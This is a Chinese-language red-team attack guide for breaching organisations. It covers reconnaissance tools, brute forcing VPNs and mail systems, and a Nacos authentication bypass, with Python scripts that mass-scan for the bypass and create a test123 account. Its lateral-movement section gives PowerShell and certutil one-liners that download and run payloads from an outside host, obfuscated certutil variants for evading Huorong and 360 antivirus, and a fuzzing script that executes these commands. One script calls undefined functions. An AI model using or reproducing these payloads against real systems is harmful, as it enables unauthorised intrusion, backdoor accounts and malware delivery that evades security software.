“挑战红队实战：优化攻防技巧，探索内网靶场实操”

外网打点

资产测绘三剑客

https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/

挖掘高价值资产

https://github.com/EdgeSecurityTeam/EHole

ehole重构了一版，需要下载source code进行自编译，realease为旧版本

https://github.com/lijiejie/BBScan

挖掘敏感信息和后台地址Targets:

–host [HOST [HOST …]]
                      Scan several hosts from command line
-f TargetFile         Load new line delimited targets from TargetFile
-d TargetDirectory   Load all *.txt files from TargetDirectory
–crawler CrawlDirectory
                      Load all *.log crawl files from CrawlDirectory
–network MASK       Scan all Target/MASK neighbour hosts,
                      should be an integer between 8 and 31

HTTP SCAN:

–rule [RuleFileName [RuleFileName …]]
                      Import specified rule files only.
-n, –no-crawl       No crawling, sub folders will not be processed
-nn, –no-check404   No HTTP 404 existence check
–full               Process all sub directories

Scripts SCAN:

–scripts-only       Scan with user scripts only
–script [ScriptName [ScriptName …]]
                      Execute specified scripts only
–no-scripts         Disable all scripts

CONCURRENT:

-p PROCESS           Num of processes running concurrently, 30 by default
-t THREADS           Num of scan threads for each scan process, 3 by default

OTHER:

–proxy Proxy         Set HTTP proxy server
–timeout Timeout     Max scan minutes for each target, 10 by default
-md                   Save scan report as markdown format
–save-ports PortsDataFile
                      Save open ports to PortsDataFile
–debug               Show verbose debug info
-nnn, –no-browser   Do not open web browser to view report
-v                   show program’s version number and exit

shiro利用

找到key之后使用常规的漏洞工具无法正常利用，可能这时候很多人就放弃了，由于这两工具缺少部分利用链可能错过漏洞

缺少双因子爆破

许多vpn、邮箱系统没有进行验证限制，可进行暴力破解

如 Global-Protect 谷歌了一波发现其用途是充当防火墙+VPN

源代码泄露

通过github筛选目标相关关键字 password xx.com

源代码项目里面可能包含了各种密码，或者是提取指纹寻找源码进行审计

webpack接口

在我们渗透过程中，越来越多的系统会采用webpack进行打包，如下图的指纹所示

工具自动化寻找未授权

https://github.com/rtcatc/Packer-Fuzzer

或查看js还原接口

右键源代码——查看检索js——在后面添加.mapcurl -O http://xx.xx.xx.xx/*.js.map

弱口令＋后台上传

碰到没有验证码的站，可以尝试进行爆破

nacos开放公网

https://github.com/Pizz33/nacos_vul

批量验证import requests
import urllib3
urllib3.disable_warnings()

# 定义自定义路径和Header
custom_path = ‘/nacos/v1/auth/users?pageNo=1&pageSize=2’
proxies = {‘http’: ‘http://127.0.0.1:8080’}
header = {
  “User-Agent”: “Nacos-Server”,
  “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8”,
  “Authorization”: “Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA”,
  “Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
  “Accept-Encoding”: “gzip, deflate”,
  “Connection”: “close”,
  “Upgrade-Insecure-Requests”: “1”,
  “Sec-Fetch-Dest”: “document”,
  “Sec-Fetch-Mode”: “navigate”,
  “Sec-Fetch-Site”: “same-origin”,
  “Pragma”: “no-cache”,
  “Te”: “trailers”,
  “Cache-Control”: “no-cache”,
}
# 从url.txt文件中读取URL列表
with open(‘url.txt’, ‘r’) as f:
  urls = f.read().splitlines()

# 循环发送GET请求并判断回显结果
for url in urls:
  full_url = url + custom_path # 拼接完整URL
  try:
      response = requests.get(full_url,proxies=proxies, headers=header,verify=False,timeout=2)
      if response.status_code == 200 and response.content.find(b”pageNumber”) != -1:
          print(f'{url} 存在nacos身份验证绕过漏洞’)
      else:
          print(f'{url} 不存在nacos身份验证绕过漏洞’)
  except requests.exceptions.RequestException as e:
      print(f'{url} 访问失败 {e}’)

脚本化添加用户import sys
import requests
from termcolor import colored
import urllib3
urllib3.disable_warnings()

proxies = {‘http’: ‘http://127.0.0.1:8080’}
# 获取命令行参数中的 URL
if len(sys.argv) < 2:
  print(“Usage: python test.py <url>”)
  sys.exit(1)
url = sys.argv[1]

post_url = “/nacos/v1/auth/users”
request_url = url + post_url

headers = {
  “User-Agent”: “Nacos-Server”,
  “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8”,
  “Authorization”: “Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA”,
  “Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
  “Accept-Encoding”: “gzip, deflate”,
  “Connection”: “close”,
  “Upgrade-Insecure-Requests”: “1”,
  “Sec-Fetch-Dest”: “document”,
  “Sec-Fetch-Mode”: “navigate”,
  “Sec-Fetch-Site”: “same-origin”,
  “Pragma”: “no-cache”,
  “Cache-Control”: “no-cache”,
}
data = {
  “username”: “test123”,
  “password”: “test123”,
}

response = requests.post(request_url, headers=headers, data=data, proxies=proxies,verify=False)

if response.status_code == 200 and response.content.find(b”ok”) != -1:
  print(colored(‘[*] ‘ + url + ‘ 存在nacos身份认证绕过漏洞！’, ‘green’))
  print(colored(‘已创建用户test123/test123’, ‘green’))
else:
  print(colored(‘[-] ‘ + url + ‘ 不存在nacos身份认证绕过漏洞！\n’, ‘red’))

threads = []
for url in urls:
  t = threading.Thread(target=send_request, args=(url,))
  threads.append(t)
  t.start()

# 等待所有线程完成
for t in threads:
  t.join()

横向利用

cobaltstrike上线

隐藏C2地址

云函数 or cdn

常规上线

1、powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://x.x.x.x/a’))”
2、certutil -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe && C:\Users\Public\1.exe

绕杀软上线

火绒

复制certutil文件copy c:\windows\system32\certutil.exe c:\programdata\a.exe && c:\programdata\a.exe -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe && C:\Users\Public\1.exe

360

缓存文件还原;,@certutil -u””r””l””c””a””c””h””e”” -split -f http://x.x.x.x/a.exe -DeleteHelloContainer
;,@certutil -u””r””l””c””a””c””h””e”” -split -f http://x.x.x.x/a.exe -deleteEnrollmentServer
;,@certutil -u””r””l””c””a””c””h””e”” -split -f http://x.x.x.x/a.exe -deletePolicyServer
;,@certutil -u””r””l””c””a””c””h””e”” -split -f http://x.x.x.x/a.exe -deleteEccCurve

move -deleteEccCurve test.exe

def

中间插入“”字符cert^u^t^il -url””””cache -sp””””lit -f http://192.168.xx.xx:7070/test.txt

通用：可通过py编写脚本 fuzz 字符寻找可绕过的语句import os
import random
import time

def insert_random_chinese_chars(s):
  “””在字符串s中随机插入中文字符”””
  chinese_chars = [“。”, “，”, “！”,”》”,”？”,”《”, “，”, “】”,”【”,”}”,”“”]
  n = len(s)
  insert_positions = sorted(random.sample(range(n), n // 4))
  for pos in reversed(insert_positions):
      s = s[:pos] + random.choice(chinese_chars) + s[pos:]
  return s

while True:
  url = “urlcache”
  url = insert_random_chinese_chars(url)
  command = f”certutil -{url} -split -f http://x.x.x.x/1.png”
  print(command)
  with open(“output.txt”, “a”) as f:
      f.write(command + “\n”)
  os.system(command)
  time.sleep(5)